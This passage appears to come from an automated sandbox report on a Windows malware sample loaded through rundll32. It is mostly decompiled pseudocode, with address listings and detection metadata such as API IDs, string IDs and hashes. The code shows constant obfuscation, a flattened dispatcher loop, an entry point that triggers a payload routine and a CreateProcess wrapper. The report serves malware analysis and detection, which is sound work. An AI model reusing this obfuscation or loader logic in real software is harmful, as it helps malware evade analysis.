				_v1692 = 0x3d2b27;
				_v1692 = _v1692 + 0x3fae;
				_t395 = 0x71;
				_v1692 = _v1692 / _t395;
				_v1692 = _v1692 + 0xffff1a11;
				_v1692 = _v1692 ^ 0xffffbf57;
				_v1632 = 0xb4dfda;
				_v1632 = _v1632 * 9;
				_v1632 = _v1632 >> 3;
				_v1632 = _v1632 ^ 0x00c4553b;
				_v1584 = 0x206e7a;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x10371375;
				_v1592 = 0x689459;
				_v1592 = _v1592 + 0xffffb773;
				_v1592 = _v1592 ^ 0x00637077;
				_v1660 = 0x8b14df;
				_v1660 = _v1660 << 0xd;
				_v1660 = _v1660 + 0x9803;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x71eeeb6f;
				_v1608 = 0x8e767e;
				_v1608 = _v1608 | 0xfaf7fbb6;
				_v1608 = _v1608 ^ 0xfaf9bdf5;
				_v1668 = 0xccd677;
				_v1668 = _v1668 * 0x78;
				_v1668 = _v1668 + 0xffff6b3d;
				_v1668 = _v1668 + 0xf0ff;
				_v1668 = _v1668 ^ 0x600a3b9e;
				_v1604 = 0x7c05f9;
				_v1604 = _v1604 + 0xd55a;
				_v1604 = _v1604 ^ 0x007aedaa;
				_t445 = _v1604;
				while(_t439 != 0x12dab9f) {
					if(_t439 == 0x2f8e73a) {
						_push(_v1604);
						_push(_t383);
						_push(_t395);
						_push(_t383);
						_push(_t383);
						_push(_v1668);
						_push(_t445);
						E002DAB87(_v1660, _v1608, __eflags);
						_t383 = 1;
						__eflags = 1;
						L23:
						return _t383;
					}
					if(_t439 == 0x92208ae) {
						_t368 = _t445;
						__eflags =  *_t445 - _t383;
						if(__eflags == 0) {
							L18:
							_t439 = 0xeef82b0;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t368 - 0x2c;
							if( *_t368 != 0x2c) {
								goto L17;
							}
							_t438 =  &_v1560;
							while(1) {
								_t368 =  &(_t368[1]);
								_t405 =  *_t368 & 0x0000ffff;
								__eflags = _t405;
								if(_t405 == 0) {
									break;
								}
								__eflags = _t405 - 0x20;
								if(_t405 == 0x20) {
									break;
								}
								 *_t438 = _t405;
								_t438 =  &(_t438[0]);
								__eflags = _t438;
							}
							_t395 = 0;
							__eflags = 0;
							 *_t438 = 0;
							L17:
							_t368 =  &(_t368[1]);
							__eflags =  *_t368 - _t383;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t439 == 0x99a67ee) {
						_t445 = E002DF899(_t395);
						_t439 = 0x92208ae;
						continue;
					}
					if(_t439 == 0x9e65a83) {
						_push(_v1612);
						_push(_v1636);
						_push(_v1688);
						_push( &_v520); // executed
						E002E46BB(_v1672, _v1620); // executed
						E002EDA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
						_push(_v1564);
						_push(_v1580);
						E002D47CE( &_v520, _v1684, _v1640, _v1596, _v1568, E002EDCF7(_v1640, 0x2d1140, __eflags),  &_v1040, _v1692, _v1632);
						_t395 = _v1584;
						E002DA8B0(_t395, _t375, _v1592);
						_t446 = _t446 - 0xc + 0x58;
						_t439 = 0x2f8e73a;
						continue;
					}
					_t457 = _t439 - 0xeef82b0;
					if(_t439 == 0xeef82b0) {
						_push(_v1696);
						_push(_v1652);
						_t381 = E002DB23C(_v1572, _v1576, E002EDCF7(_v1644, 0x2d10c0, _t457), _v1600, _v1664,  &_v1560); // executed
						_t395 = _v1648;
						asm("sbb edi, edi");
						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
						E002DA8B0(_t395, _t379, _v1588);
						_t446 =  &(_t446[7]);
					}
					L20:
					if(_t439 != 0xdf158d7) {
						continue;
					}
					goto L23;
				}
				E002D4B61( &_v1560, 0x208, _v1616, _v1624);
				_pop(_t395);
				_t439 = 0x99a67ee;
				goto L20;
			}




























































                                                                                                                                  0x002df8fd
                                                                                                                                  0x002df903
                                                                                                                                  0x002df90d
                                                                                                                                  0x002df917
                                                                                                                                  0x002df91c
                                                                                                                                  0x002df927
                                                                                                                                  0x002df929
                                                                                                                                  0x002df92c
                                                                                                                                  0x002df931
                                                                                                                                  0x002df935
                                                                                                                                  0x002df93d
                                                                                                                                  0x002df945
                                                                                                                                  0x002df94d
                                                                                                                                  0x002df952
                                                                                                                                  0x002df95a
                                                                                                                                  0x002df96a
                                                                                                                                  0x002df96e
                                                                                                                                  0x002df973
                                                                                                                                  0x002df97b
                                                                                                                                  0x002df983
                                                                                                                                  0x002df98d
                                                                                                                                  0x002df98e
                                                                                                                                  0x002df997
                                                                                                                                  0x002df99b
                                                                                                                                  0x002df9a3
                                                                                                                                  0x002df9ab
                                                                                                                                  0x002df9b3
                                                                                                                                  0x002df9bb
                                                                                                                                  0x002df9c3
                                                                                                                                  0x002df9cb
                                                                                                                                  0x002df9d3
                                                                                                                                  0x002df9db
                                                                                                                                  0x002df9e3
                                                                                                                                  0x002df9f0
                                                                                                                                  0x002df9f4
                                                                                                                                  0x002df9fe
                                                                                                                                  0x002dfa02
                                                                                                                                  0x002dfa0a
                                                                                                                                  0x002dfa15
                                                                                                                                  0x002dfa20
                                                                                                                                  0x002dfa2b
                                                                                                                                  0x002dfa36
                                                                                                                                  0x002dfa41
                                                                                                                                  0x002dfa4c
                                                                                                                                  0x002dfa54
                                                                                                                                  0x002dfa5c
                                                                                                                                  0x002dfa64
                                                                                                                                  0x002dfa71
                                                                                                                                  0x002dfa75
                                                                                                                                  0x002dfa7d
                                                                                                                                  0x002dfa85
                                                                                                                                  0x002dfa8d
                                                                                                                                  0x002dfa95
                                                                                                                                  0x002dfaa0
                                                                                                                                  0x002dfaa4
                                                                                                                                  0x002dfaac
                                                                                                                                  0x002dfab7
                                                                                                                                  0x002dfabf
                                                                                                                                  0x002dfac6
                                                                                                                                  0x002dfad1
                                                                                                                                  0x002dfae1
                                                                                                                                  0x002dfae6
                                                                                                                                  0x002dfaf0
                                                                                                                                  0x002dfaf5
                                                                                                                                  0x002dfafb
                                                                                                                                  0x002dfb03
                                                                                                                                  0x002dfb0b
                                                                                                                                  0x002dfb18
                                                                                                                                  0x002dfb1b
                                                                                                                                  0x002dfb1f
                                                                                                                                  0x002dfb27
                                                                                                                                  0x002dfb2f
                                                                                                                                  0x002dfb37
                                                                                                                                  0x002dfb3f
                                                                                                                                  0x002dfb47
                                                                                                                                  0x002dfb4f
                                                                                                                                  0x002dfb57
                                                                                                                                  0x002dfb5f
                                                                                                                                  0x002dfb6c
                                                                                                                                  0x002dfb70
                                                                                                                                  0x002dfb78
                                                                                                                                  0x002dfb84
                                                                                                                                  0x002dfb89
                                                                                                                                  0x002dfb8f
                                                                                                                                  0x002dfb93
                                                                                                                                  0x002dfb9b
                                                                                                                                  0x002dfba3
                                                                                                                                  0x002dfbab
                                                                                                                                  0x002dfbb3
                                                                                                                                  0x002dfbc0
                                                                                                                                  0x002dfbc3
                                                                                                                                  0x002dfbc7
                                                                                                                                  0x002dfbcf
                                                                                                                                  0x002dfbd7
                                                                                                                                  0x002dfbdf
                                                                                                                                  0x002dfbe7
                                                                                                                                  0x002dfbef
                                                                                                                                  0x002dfbf7
                                                                                                                                  0x002dfbff
                                                                                                                                  0x002dfc04
                                                                                                                                  0x002dfc0c
                                                                                                                                  0x002dfc14
                                                                                                                                  0x002dfc24
                                                                                                                                  0x002dfc28
                                                                                                                                  0x002dfc30
                                                                                                                                  0x002dfc43
                                                                                                                                  0x002dfc44
                                                                                                                                  0x002dfc4b
                                                                                                                                  0x002dfc56
                                                                                                                                  0x002dfc61
                                                                                                                                  0x002dfc6c
                                                                                                                                  0x002dfc77
                                                                                                                                  0x002dfc87
                                                                                                                                  0x002dfc91
                                                                                                                                  0x002dfc96
                                                                                                                                  0x002dfc9c
                                                                                                                                  0x002dfca4
                                                                                                                                  0x002dfcac
                                                                                                                                  0x002dfcb4
                                                                                                                                  0x002dfcb9
                                                                                                                                  0x002dfcc1
                                                                                                                                  0x002dfccc
                                                                                                                                  0x002dfcd7
                                                                                                                                  0x002dfce2
                                                                                                                                  0x002dfcea
                                                                                                                                  0x002dfcf6
                                                                                                                                  0x002dfcf9
                                                                                                                                  0x002dfcfd
                                                                                                                                  0x002dfd05
                                                                                                                                  0x002dfd0d
                                                                                                                                  0x002dfd1a
                                                                                                                                  0x002dfd1e
                                                                                                                                  0x002dfd23
                                                                                                                                  0x002dfd2b
                                                                                                                                  0x002dfd36
                                                                                                                                  0x002dfd3e
                                                                                                                                  0x002dfd49
                                                                                                                                  0x002dfd51
                                                                                                                                  0x002dfd59
                                                                                                                                  0x002dfd61
                                                                                                                                  0x002dfd69
                                                                                                                                  0x002dfd6e
                                                                                                                                  0x002dfd76
                                                                                                                                  0x002dfd7b
                                                                                                                                  0x002dfd83
                                                                                                                                  0x002dfd8b
                                                                                                                                  0x002dfd93
                                                                                                                                  0x002dfd9b
                                                                                                                                  0x002dfda8
                                                                                                                                  0x002dfdac
                                                                                                                                  0x002dfdb4
                                                                                                                                  0x002dfdbc
                                                                                                                                  0x002dfdc4
                                                                                                                                  0x002dfdcc
                                                                                                                                  0x002dfdd4
                                                                                                                                  0x002dfddc
                                                                                                                                  0x002dfde0
                                                                                                                                  0x002dfdf2
                                                                                                                                  0x002dffd1
                                                                                                                                  0x002dffd5
                                                                                                                                  0x002dffd6
                                                                                                                                  0x002dffd7
                                                                                                                                  0x002dffd8
                                                                                                                                  0x002dffd9
                                                                                                                                  0x002dffe8
                                                                                                                                  0x002dffe9
                                                                                                                                  0x002dfff3
                                                                                                                                  0x002dfff3
                                                                                                                                  0x002dfff7
                                                                                                                                  0x002e0000
                                                                                                                                  0x002e0000
                                                                                                                                  0x002dfdfe
                                                                                                                                  0x002dff5e
                                                                                                                                  0x002dff60
                                                                                                                                  0x002dff64
                                                                                                                                  0x002dff99
                                                                                                                                  0x002dff99
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff66
                                                                                                                                  0x002dff66
                                                                                                                                  0x002dff66
                                                                                                                                  0x002dff6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff6c
                                                                                                                                  0x002dff81
                                                                                                                                  0x002dff81
                                                                                                                                  0x002dff84
                                                                                                                                  0x002dff87
                                                                                                                                  0x002dff8a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff75
                                                                                                                                  0x002dff79
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff7b
                                                                                                                                  0x002dff7e
                                                                                                                                  0x002dff7e
                                                                                                                                  0x002dff7e
                                                                                                                                  0x002dff8c
                                                                                                                                  0x002dff8c
                                                                                                                                  0x002dff8e
                                                                                                                                  0x002dff91
                                                                                                                                  0x002dff91
                                                                                                                                  0x002dff94
                                                                                                                                  0x002dff94
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff66
                                                                                                                                  0x002dfe0a
                                                                                                                                  0x002dff52
                                                                                                                                  0x002dff54
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff54
                                                                                                                                  0x002dfe16
                                                                                                                                  0x002dfe8f
                                                                                                                                  0x002dfe9a
                                                                                                                                  0x002dfe9e
                                                                                                                                  0x002dfead
                                                                                                                                  0x002dfeae
                                                                                                                                  0x002dfecf
                                                                                                                                  0x002dfed4
                                                                                                                                  0x002dfee0
                                                                                                                                  0x002dff22
                                                                                                                                  0x002dff2e
                                                                                                                                  0x002dff37
                                                                                                                                  0x002dff3c
                                                                                                                                  0x002dff3f
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff3f
                                                                                                                                  0x002dfe18
                                                                                                                                  0x002dfe1e
                                                                                                                                  0x002dfe24
                                                                                                                                  0x002dfe2d
                                                                                                                                  0x002dfe5e
                                                                                                                                  0x002dfe6a
                                                                                                                                  0x002dfe74
                                                                                                                                  0x002dfe7c
                                                                                                                                  0x002dfe82
                                                                                                                                  0x002dfe87
                                                                                                                                  0x002dfe87
                                                                                                                                  0x002dffc3
                                                                                                                                  0x002dffc9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dffcf
                                                                                                                                  0x002dffb7
                                                                                                                                  0x002dffbd
                                                                                                                                  0x002dffbe
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                                  • API String ID: 1514166925-3316477785
                                                                                                                                  • Opcode ID: 432887e26f827acec335b423d88e0cdcf54da50756b1309b11abac28f8d15828
                                                                                                                                  • Instruction ID: 5b5d8903d7a71f567c1552bff03628dfeb4e99976a5c74abc5c972aa2acfc61d
                                                                                                                                  • Opcode Fuzzy Hash: 432887e26f827acec335b423d88e0cdcf54da50756b1309b11abac28f8d15828
                                                                                                                                  • Instruction Fuzzy Hash: BB0232725083818FD368CF25C58AA0BFBE2BBC5718F108A1EF1D986260D7B58959CF47
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DE991 Relevance: 2.6, Strings: 2, Instructions: 68COMMONCrypto
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 267 2de991-2dea60 268 2dea90-2dea96 267->268 269 2dea62-2dea77 call 2df8fd 267->269 269->268 272 2dea79-2dea88 call 2d93ed 269->272 274 2dea8d 272->274 274->268
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			_entry_(intOrPtr _a4, char _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_v32 = _v32 & 0x00000000;
				_v44 = 0xa88528;
				_v40 = 0x811176;
				_v36 = 0xed2c64;
				_v20 = 0x893932;
				_v20 = _v20 ^ 0x2faf083b;
				_v20 = _v20 ^ 0x2f2d1c53;
				_v8 = 0xbe2d1;
				_t85 = 0x2e;
				_v8 = _v8 / _t85;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0xffff961f;
				_v8 = _v8 ^ 0xfff451d0;
				_v16 = 0x50855f;
				_v16 = _v16 >> 8;
				_t86 = 0x5e;
				_v16 = _v16 / _t86;
				_v16 = _v16 ^ 0x0002614f;
				_v28 = 0x752e5d;
				_t36 =  &_v28; // 0x752e5d
				_t87 = 0x4e;
				_v28 =  *_t36 * 0x6f;
				_v28 = _v28 ^ 0x32c1ec83;
				_v12 = 0xba9db2;
				_v12 = _v12 * 0x41;
				_v12 = _v12 + 0xfc46;
				_v12 = _v12 | 0x4911db39;
				_v12 = _v12 ^ 0x6f7f0271;
				_v24 = 0x2e0372;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000c7ca5;
				_t58 =  &_a8;
				 *_t58 = _a8 - 1;
				if( *_t58 == 0) {
					 *0x2f320c = _a4;
					if(E002DF8FD() != 0) {
						E002D93ED(); // executed
					}
				}
				return 1;
			}
















                                                                                                                                  0x002de997
                                                                                                                                  0x002de99d
                                                                                                                                  0x002de9a4
                                                                                                                                  0x002de9ab
                                                                                                                                  0x002de9b2
                                                                                                                                  0x002de9b9
                                                                                                                                  0x002de9c0
                                                                                                                                  0x002de9c7
                                                                                                                                  0x002de9d3
                                                                                                                                  0x002de9d8
                                                                                                                                  0x002de9dd
                                                                                                                                  0x002de9e1
                                                                                                                                  0x002de9e8
                                                                                                                                  0x002de9ef
                                                                                                                                  0x002de9f6
                                                                                                                                  0x002de9fd
                                                                                                                                  0x002dea02
                                                                                                                                  0x002dea07
                                                                                                                                  0x002dea0e
                                                                                                                                  0x002dea15
                                                                                                                                  0x002dea19
                                                                                                                                  0x002dea1a
                                                                                                                                  0x002dea1d
                                                                                                                                  0x002dea24
                                                                                                                                  0x002dea2f
                                                                                                                                  0x002dea32
                                                                                                                                  0x002dea39
                                                                                                                                  0x002dea40
                                                                                                                                  0x002dea47
                                                                                                                                  0x002dea53
                                                                                                                                  0x002dea56
                                                                                                                                  0x002dea5d
                                                                                                                                  0x002dea5d
                                                                                                                                  0x002dea60
                                                                                                                                  0x002dea65
                                                                                                                                  0x002dea77
                                                                                                                                  0x002dea88
                                                                                                                                  0x002dea8d
                                                                                                                                  0x002dea77
                                                                                                                                  0x002dea96

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess
                                                                                                                                  • String ID: ].u$d,
                                                                                                                                  • API String ID: 621844428-1507873175
                                                                                                                                  • Opcode ID: 28e6a2af7b2208f69e6950f18d2eac72de15b9538877aa2b1a92d7c9396dc74f
                                                                                                                                  • Instruction ID: 0095815b3e43e42d0b9f8d70fbca3eb9a6e95d27521f6b72bb983f23b32004ab
                                                                                                                                  • Opcode Fuzzy Hash: 28e6a2af7b2208f69e6950f18d2eac72de15b9538877aa2b1a92d7c9396dc74f
                                                                                                                                  • Instruction Fuzzy Hash: E831F4B1D0020AEBDB08DFA4DA8A59EBBF0FB54314F208199D510BB254D7B45B959F80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DAB87 Relevance: 1.4, Strings: 1, Instructions: 154COMMONCrypto
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 288 2dab87-2dad94 call 2e20b9 call 2d4b61 call 2d7f5d 294 2dad99-2dad9e 288->294 295 2daddd 294->295 296 2dada0-2dada2 294->296 297 2daddf-2dade5 295->297 298 2dada4-2dadaa 296->298 299 2dadb0-2daddb call 2e1e67 * 2 296->299 300 2dadab-2dadae 298->300 299->300 300->297
                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E002DAB87(void* __ecx, void* __edx, void* __eflags) {
				void* _t151;
				void* _t163;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr* _t193;
				void* _t194;

				_t193 = _t194 - 0x5c;
				_push( *((intOrPtr*)(_t193 + 0x7c)));
				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
				_push( *((intOrPtr*)(_t193 + 0x78)));
				_push(0);
				_push( *((intOrPtr*)(_t193 + 0x70)));
				_push(_t187);
				_push( *((intOrPtr*)(_t193 + 0x68)));
				_push( *((intOrPtr*)(_t193 + 0x64)));
				_push(__ecx);
				E002E20B9(_t151);
				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
				 *(_t193 + 0x34) = 0xb35e3d;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
				 *(_t193 + 0x1c) = 0xb39a57;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
				 *(_t193 + 0x54) = 0x8cfebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
				_t169 = 0x1d;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
				 *(_t193 + 0x24) = 0xadd23a;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
				 *(_t193 + 0x20) = 0x1d5481;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
				 *(_t193 + 0x2c) = 0x3c40b3;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
				 *(_t193 + 0x3c) = 0x52e0cb;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
				 *(_t193 + 0x4c) = 0x46a878;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
				 *(_t193 + 0x30) = 0x13da24;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
				 *(_t193 + 0x44) = 0xdb90c5;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
				 *(_t193 + 0x38) = 0xc3d0db;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
				 *(_t193 + 0x58) = 0x1a470a;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
				 *(_t193 + 0x40) = 0xc6f633;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
				 *(_t193 + 0x50) = 0xa2e0bb;
				_t170 = 0x56;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
				 *(_t193 + 0x28) = 0x4b9267;
				_t171 = 0x28;
				_t115 = _t193 - 0x48; // 0x181c8bbc
				_t172 = _t115;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
				 *(_t193 + 0x48) = 0xd50758;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
				_push( *(_t193 + 0x1c));
				_push( *(_t193 + 0x34));
				_t190 = 0x44;
				E002D4B61(_t115, _t190);
				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
				_t129 = _t193 - 4; // 0x181c8c00
				_t131 = _t193 - 0x48; // 0x181c8bbc
				_t163 = E002D7F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
				if(_t163 == 0) {
					_t164 = 0;
				} else {
					if(_t187 == 0) {
						E002E1E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
						E002E1E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t164 = 1;
				}
				return _t164;
			}













                                                                                                                                  0x002dab88
                                                                                                                                  0x002dab94
                                                                                                                                  0x002dab97
                                                                                                                                  0x002dab9a
                                                                                                                                  0x002dab9d
                                                                                                                                  0x002dab9f
                                                                                                                                  0x002daba2
                                                                                                                                  0x002daba3
                                                                                                                                  0x002daba6
                                                                                                                                  0x002dabaa
                                                                                                                                  0x002dabab
                                                                                                                                  0x002dabb0
                                                                                                                                  0x002dabb6
                                                                                                                                  0x002dabbd
                                                                                                                                  0x002dabc4
                                                                                                                                  0x002dabcb
                                                                                                                                  0x002dabd2
                                                                                                                                  0x002dabd6
                                                                                                                                  0x002dabdd
                                                                                                                                  0x002dabe4
                                                                                                                                  0x002dabeb
                                                                                                                                  0x002dabf2
                                                                                                                                  0x002dabf9
                                                                                                                                  0x002dac00
                                                                                                                                  0x002dac09
                                                                                                                                  0x002dac0e
                                                                                                                                  0x002dac13
                                                                                                                                  0x002dac1a
                                                                                                                                  0x002dac21
                                                                                                                                  0x002dac28
                                                                                                                                  0x002dac2f
                                                                                                                                  0x002dac36
                                                                                                                                  0x002dac3d
                                                                                                                                  0x002dac44
                                                                                                                                  0x002dac4b
                                                                                                                                  0x002dac52
                                                                                                                                  0x002dac59
                                                                                                                                  0x002dac60
                                                                                                                                  0x002dac67
                                                                                                                                  0x002dac6e
                                                                                                                                  0x002dac75
                                                                                                                                  0x002dac79
                                                                                                                                  0x002dac80
                                                                                                                                  0x002dac87
                                                                                                                                  0x002dac8e
                                                                                                                                  0x002dac91
                                                                                                                                  0x002dac98
                                                                                                                                  0x002dac9f
                                                                                                                                  0x002daca3
                                                                                                                                  0x002dacaa
                                                                                                                                  0x002dacb1
                                                                                                                                  0x002dacb8
                                                                                                                                  0x002dacbc
                                                                                                                                  0x002dacc3
                                                                                                                                  0x002dacca
                                                                                                                                  0x002daccd
                                                                                                                                  0x002dacd4
                                                                                                                                  0x002dacdb
                                                                                                                                  0x002dace2
                                                                                                                                  0x002dace9
                                                                                                                                  0x002daced
                                                                                                                                  0x002dacf4
                                                                                                                                  0x002dacfb
                                                                                                                                  0x002dad05
                                                                                                                                  0x002dad08
                                                                                                                                  0x002dad0b
                                                                                                                                  0x002dad16
                                                                                                                                  0x002dad19
                                                                                                                                  0x002dad20
                                                                                                                                  0x002dad2c
                                                                                                                                  0x002dad31
                                                                                                                                  0x002dad31
                                                                                                                                  0x002dad34
                                                                                                                                  0x002dad37
                                                                                                                                  0x002dad3e
                                                                                                                                  0x002dad45
                                                                                                                                  0x002dad4c
                                                                                                                                  0x002dad50
                                                                                                                                  0x002dad57
                                                                                                                                  0x002dad5a
                                                                                                                                  0x002dad5f
                                                                                                                                  0x002dad62
                                                                                                                                  0x002dad6a
                                                                                                                                  0x002dad6d
                                                                                                                                  0x002dad74
                                                                                                                                  0x002dad94
                                                                                                                                  0x002dad9e
                                                                                                                                  0x002daddd
                                                                                                                                  0x002dada0
                                                                                                                                  0x002dada2
                                                                                                                                  0x002dadbf
                                                                                                                                  0x002dadd3
                                                                                                                                  0x002dada4
                                                                                                                                  0x002dada7
                                                                                                                                  0x002dada8
                                                                                                                                  0x002dada9
                                                                                                                                  0x002dadaa
                                                                                                                                  0x002dadaa
                                                                                                                                  0x002dadad
                                                                                                                                  0x002dadad
                                                                                                                                  0x002dade5

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID: nJQ
                                                                                                                                  • API String ID: 963392458-2884827605
                                                                                                                                  • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
